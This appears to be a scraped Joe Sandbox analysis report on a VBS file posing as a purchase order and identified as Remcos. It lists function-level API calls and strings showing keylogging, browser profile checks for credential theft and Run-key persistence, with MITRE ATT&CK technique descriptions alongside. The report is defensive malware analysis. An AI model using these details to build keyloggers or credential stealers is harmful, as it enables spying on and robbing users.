API String ID: 481472006-507513762
Opcode ID: 38a968fbfb39420bb19cc7190e3be632f606f2fd3d51ef38d5bd9d39a9ed176f
Instruction ID: 0beb7a88d254a358a963561f9d97893b624dd36ca90e96b80d49a5b3b1f878f3
Opcode Fuzzy Hash: 38a968fbfb39420bb19cc7190e3be632f606f2fd3d51ef38d5bd9d39a9ed176f
Instruction Fuzzy Hash: 092137719042406BD304B7219D2976F7794A745308F04047EF845132E2DBBD5988CB9F

Function 00432D4B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00432D8F
___raise_securityfailure.LIBCMT ref: 00432E76

Strings

(F, xrefs: 00432E71

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: (F
API String ID: 3761405300-3109638091
Opcode ID: 8d70a3cd03553c2d68efa77227729d50617932ca87f7888c32547dfbcc783ade
Instruction ID: 494dc9d0fce29d31cb3ef34e393fed80e8221b4646dfbf54f91bf1ae82b1ca01
Opcode Fuzzy Hash: 8d70a3cd03553c2d68efa77227729d50617932ca87f7888c32547dfbcc783ade
Instruction Fuzzy Hash: 8C21F0BD500205DEE700DF16E9856403BE4BB49314F20943AE9088B3A1F3F669918F9F

Function 004194DA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(00000000), ref: 004194F4

Strings

| , xrefs: 00419527
%02i:%02i:%02i:%03i , xrefs: 00419509

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: LocalTime
String ID: | $%02i:%02i:%02i:%03i
API String ID: 481472006-2430845779
Opcode ID: 07f86f52f9fe5ad8dc19ba50befdd62a3544993bc388c75ec5461e2102273a9c
Instruction ID: bce8772fa89f7f7ff9e68bb522557632f538b64cb503c22793e2f51f4d03e72f
Opcode Fuzzy Hash: 07f86f52f9fe5ad8dc19ba50befdd62a3544993bc388c75ec5461e2102273a9c
Instruction Fuzzy Hash: 68117F315042015AC304FBA5D8518EBB3E8AB94308F500A3FF895A21E2FF3CDA49C65A

Function 00418CCD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000,00000000,?,?,?,?,?,00415594,00000000), ref: 00418CF2

Strings

x(G, xrefs: 00418CFC
alarm.wav, xrefs: 00418CDD

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: alarm.wav$x(G
API String ID: 1174141254-2413638199
Opcode ID: 35b7fd8c42e8a9877effe4b9b8fa32281001cd31cbef35761c7d7cb37d8788de
Instruction ID: fe962266bcbe9b481af3baecc2186877703bd5259ecc619923a55b1e0e4c82aa
Opcode Fuzzy Hash: 35b7fd8c42e8a9877effe4b9b8fa32281001cd31cbef35761c7d7cb37d8788de
Instruction Fuzzy Hash: 40019270B0430056C604F7A6E9566EE37958BA1358F00857FA849672E2EEBD4D45C6CF

Function 00409F9A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A0BE
Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F

Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4

CloseHandle.KERNEL32(?), ref: 00409FFD
UnhookWindowsHookEx.USER32 ref: 0040A010

Strings

Online Keylogger Stopped, xrefs: 00409FAA, 00409FB2, 00409FD9

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
String ID: Online Keylogger Stopped
API String ID: 1623830855-1496645233
Opcode ID: 95be6b2d5d1265815bc3ce4225fc1cdac552dc75167390ee86932ead681b8db3
Instruction ID: de94d33b988dbd75262e40483fa5bc1fa77a380ea8b62c1163629748a83ca489
Opcode Fuzzy Hash: 95be6b2d5d1265815bc3ce4225fc1cdac552dc75167390ee86932ead681b8db3
Instruction Fuzzy Hash: 2601F530A003045BD7257F24C81BBBE7BB59B82304F40056FE541225D2EAB91866E7DF

Function 0040B467 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000,?,?,?,?,?,?,0040B5A1), ref: 0040B49A

Strings

\AppData\Local\Microsoft\Edge\, xrefs: 0040B484
UserProfile, xrefs: 0040B46E

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: UserProfile$\AppData\Local\Microsoft\Edge\
API String ID: 1174141254-2800177040
Opcode ID: f72588871a47a103f08bd557687f8b84f797b2eb235cb9e389d344094cad4272
Instruction ID: 5821409638838460856efc798fa08f59aead72c028a5ec3eaf808f19191aee33
Opcode Fuzzy Hash: f72588871a47a103f08bd557687f8b84f797b2eb235cb9e389d344094cad4272
Instruction Fuzzy Hash: CBF0547090021996CA04FBA6CC57DFF7B6CDA10715B40057FBA01721D3EEBC9E5586D9

Function 0040B404 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000,?,?,?,?,?,?,0040B53E), ref: 0040B437

Strings

\AppData\Local\Google\Chrome\, xrefs: 0040B421
UserProfile, xrefs: 0040B40B

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: UserProfile$\AppData\Local\Google\Chrome\
API String ID: 1174141254-4188645398
Opcode ID: 4c5869dc73605c4198742c87f314f8ffe11a8100b16f69da5b982344c5d6b7fa
Instruction ID: 3f8b084fd7c06795b4d0fa8893062b22b44e731770192fac0e06baefb29df0f7
Opcode Fuzzy Hash: 4c5869dc73605c4198742c87f314f8ffe11a8100b16f69da5b982344c5d6b7fa
Instruction Fuzzy Hash: 3DF08970A0021996CA04FBA6DC479FF7B6CDA10715B40007F7A01721D3EEBC9E498ADD

Function 0040B4CA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000,?,?,?,?,?,?,0040B604), ref: 0040B4FD

Strings

\Opera Software\Opera Stable\, xrefs: 0040B4E7
AppData, xrefs: 0040B4D1

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: AppData$\Opera Software\Opera Stable\
API String ID: 1174141254-1629609700
Opcode ID: 0cb57bc748a43cdf280c296903742492f5481ab6d2799d92af52763c0172cfec
Instruction ID: 52471f63f703214977655dbdffc05bc1b666495b4e4508f2cd1aa44db4b955b6
Opcode Fuzzy Hash: 0cb57bc748a43cdf280c296903742492f5481ab6d2799d92af52763c0172cfec
Instruction Fuzzy Hash: 2AF05430900219A6C604FBA6CC479EF7B6C9A50709B40047FB901722D3EEB99A4586DD

Function 0040A592 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000011), ref: 0040A597

Part of subcall function 00409468: GetForegroundWindow.USER32(00472008,?,00472008), ref: 0040949C
Part of subcall function 00409468: GetWindowThreadProcessId.USER32(00000000,?), ref: 004094A7
Part of subcall function 00409468: GetKeyboardLayout.USER32(00000000), ref: 004094AE
Part of subcall function 00409468: GetKeyState.USER32(00000010), ref: 004094B8
Part of subcall function 00409468: GetKeyboardState.USER32(?), ref: 004094C5
Part of subcall function 00409468: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 004094E1

Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,?,0040A77B,?,?,?,?,?,00000000), ref: 0040965A

Strings

[AltL], xrefs: 0040A5D9
[AltR], xrefs: 0040A5CD

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: State$KeyboardWindow$EventForegroundLayoutProcessThreadUnicode
String ID: [AltL]$[AltR]
API String ID: 3195419117-2658077756
Opcode ID: c7c7ad3f27c2af8ea36dcc5d825e618062cde7260dbebf7789c9b1878f0a465e
Instruction ID: 29e442ca109236f59d068076b5b59df2bd5c1a98fb0e5871b2f0b43888bf59e1
Opcode Fuzzy Hash: c7c7ad3f27c2af8ea36dcc5d825e618062cde7260dbebf7789c9b1878f0a465e
Instruction Fuzzy Hash: E0E0E52170432026C828363E2D2B6AE39109741761B80006FF8436B2C6EC7E8D1043CF

Function 0040A5EC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000012), ref: 0040A5F1

Strings

[CtrlR], xrefs: 0040A60E
[CtrlL], xrefs: 0040A61F

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: State
String ID: [CtrlL]$[CtrlR]
API String ID: 1649606143-2446555240
Opcode ID: 8e7e769867d94fe63cd06e7140cf990a5fd4f428e2263eac50557698d3f8299e
Instruction ID: c9b4056729f6320a31326482d9effdd17bd0eb8d0dea22e3f8a852eb4ad5c27f
Opcode Fuzzy Hash: 8e7e769867d94fe63cd06e7140cf990a5fd4f428e2263eac50557698d3f8299e
Instruction Fuzzy Hash: 53E02672B043112AC414397E551EA2A286087917A9F46042FECC3672C3D87F8D2203CF

Function 00412414 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,004721E8,80000002,80000002,0040BD02,00000000,?,00472200,pth_unenc,004721E8), ref: 00412422
RegDeleteValueW.ADVAPI32(004721E8,?,?,00472200,pth_unenc,004721E8), ref: 00412436

Strings

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412420

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: DeleteOpenValue
String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
API String ID: 2654517830-1051519024
Opcode ID: 45be350e15fffb6ae5252e7309d7a4a092feaea6bf63e3a5136c94c60f555a57
Instruction ID: b623b948bfdfa0337ccefb4abe002260ff2e01b184ebd3416e4b53d264740477
Opcode Fuzzy Hash: 45be350e15fffb6ae5252e7309d7a4a092feaea6bf63e3a5136c94c60f555a57
Instruction Fuzzy Hash: 9BE0C231244208BBDF108F71DE07FFA372CDB01F01F5042A5BD0592091C666CE149664

Function 00433058 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 00433064

Part of subcall function 00432FCD: std::exception::exception.LIBCONCRT ref: 00432FDA

__CxxThrowException@8.LIBVCRUNTIME ref: 00433072

Part of subcall function 00436EC6: RaiseException.KERNEL32(?,?,00433057,?,?,?,00000000,?,?,?,P@,00433057,?,0046B09C,00000000), ref: 00436F25

Strings

P@, xrefs: 00433058

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: ExceptionException@8RaiseThrowstd::exception::exceptionstd::invalid_argument::invalid_argument
String ID: P@
API String ID: 1586462112-676759640
Opcode ID: d34f057b204cbc7e51539216932af2e5b0516ce62ca17289c65ad8c524a6b4fa
Instruction ID: 0bfe0c8ac6dbc9b0d4453f7df384559b02cf33d5589a4338b6e2a72978291aeb
Opcode Fuzzy Hash: d34f057b204cbc7e51539216932af2e5b0516ce62ca17289c65ad8c524a6b4fa
Instruction Fuzzy Hash: 5CC08034C0020C77CB00F6E1C907C8D773C5D04300F405416B51091081E774531D96D5

Function 00433038 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 00433044

Part of subcall function 00432F76: std::exception::exception.LIBCONCRT ref: 00432F83

__CxxThrowException@8.LIBVCRUNTIME ref: 00433052

Part of subcall function 00436EC6: RaiseException.KERNEL32(?,?,00433057,?,?,?,00000000,?,?,?,P@,00433057,?,0046B09C,00000000), ref: 00436F25

Strings

P@, xrefs: 00433038

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: ExceptionException@8RaiseThrowstd::exception::exceptionstd::invalid_argument::invalid_argument
String ID: P@
API String ID: 1586462112-676759640
Opcode ID: 0f635586152ab29110567b9c987066954b21ef4f476975f95e78209acc4c7d60
Instruction ID: 865ee2ddef0a897f612f6fb2ad11127a6c44acc13293d016e759f8d59b40e8c3
Opcode Fuzzy Hash: 0f635586152ab29110567b9c987066954b21ef4f476975f95e78209acc4c7d60
Instruction Fuzzy Hash: 15C08034C0010CB7CB00FAF5D907D8E773C5904340F409015B61091041E7B8631C87C5

Function 0043B445 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D35), ref: 0043B4DB
GetLastError.KERNEL32 ref: 0043B4E9
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043B544

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 570887f611a5d1f74d34073c32c2f77717d7cd84bcf1f9b239cc9e46d00ed125
Instruction ID: 0ecaebee41cb6558e50c6262f5020644a21471e748dd5a13caac6b8f2b864e38
Opcode Fuzzy Hash: 570887f611a5d1f74d34073c32c2f77717d7cd84bcf1f9b239cc9e46d00ed125
Instruction Fuzzy Hash: AD411630600205BFDB229F65D844B6B7BB4EF09328F14516EFA59AB3A1DB38CD01C799

Function 004105C4 Relevance: 5.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000014), ref: 004105F1
IsBadReadPtr.KERNEL32(?,00000014), ref: 004106BD
SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004106DF
SetLastError.KERNEL32(0000007E,00410955), ref: 004106F6

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: ErrorLastRead
String ID:
API String ID: 4100373531-0
Opcode ID: 9879e5f97f9034714067de51e7f9b75c8f83f84791738768acf52853c1cf03dd
Instruction ID: 0e21605053d2ba8273329305491efaf700724209343246308e891da9604144dc
Opcode Fuzzy Hash: 9879e5f97f9034714067de51e7f9b75c8f83f84791738768acf52853c1cf03dd
Instruction Fuzzy Hash: 73417C71644305DFE7208F18DC84BA7B7E4FF88714F00442EE54687691EBB5E8A5CB19

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Containers, IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as `sc query` , `tasklist /svc` , `systemctl --type=service` , and `net start` .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Purchase Order - PO14895.vbs

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Remcos

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\remcos\logs.dat

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k0hlav5g.lh0.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lehcme0q.gxj.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lh0x5tnr.cak.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t3hpztb5.1fc.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xqlgpeui.ral.ps1

Windows Analysis Report
Purchase Order - PO14895.vbs

Function 00007FF886C4B5AB Relevance: 3.3, APIs: 2, Instructions: 271
processCOMMON

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

